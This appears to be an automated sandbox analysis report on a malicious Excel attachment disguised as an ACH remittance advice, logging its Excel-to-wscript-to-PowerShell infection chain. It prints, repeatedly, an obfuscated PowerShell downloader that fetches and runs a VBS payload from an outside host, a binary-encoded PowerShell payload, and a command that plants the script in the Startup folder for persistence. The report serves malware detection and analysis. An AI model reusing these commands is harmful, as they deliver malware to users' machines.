Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4874
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4874Jump to behavior
Document contains an embedded macro with GUI obfuscation
Source: ACH Remittance Advice_CITI25822.xlsStream path 'Workbook' : Found suspicious string shell.application in non macro stream
Source: ~DF4FEF5585DDEBC2FF.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF837617B7CBBF1532.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: RecoveryStore.{70A1164A-250E-11ED-A620-ECF4BBB5915B}.dat.6.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: {70A1164C-250E-11ED-A620-ECF4BBB5915B}.dat.6.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ACH Remittance Advice_CITI25822.xlsOLE indicator, VBA macros: true
Source: ACH Remittance Advice_CITI25822.xls.0.drOLE indicator, VBA macros: true
Source: ~DF9B400455113A3652.TMP.0.drOLE indicator, VBA macros: true
Source: ACH Remittance Advice_CITI25822.xlsVirustotal: Detection: 13%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js" Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\sfoWQ.txtJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6BEB.tmpJump to behavior
Source: classification engineClassification label: mal80.expl.evad.winXLS@20/31@4/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: ACH Remittance Advice_CITI25822.xlsOLE indicator, Workbook stream: true
Source: ACH Remittance Advice_CITI25822.xls.0.drOLE indicator, Workbook stream: true
Source: ~DF9B400455113A3652.TMP.0.drOLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbagemen source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :ystem.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 0000000F.00000002.966928962.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdbyp source: powershell.exe, 00000003.00000002.921917508.0000000002776000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: ~DF4FEF5585DDEBC2FF.TMP.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')

Boot Survival

barindex
Drops VBS files to the startup folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbsJump to behavior
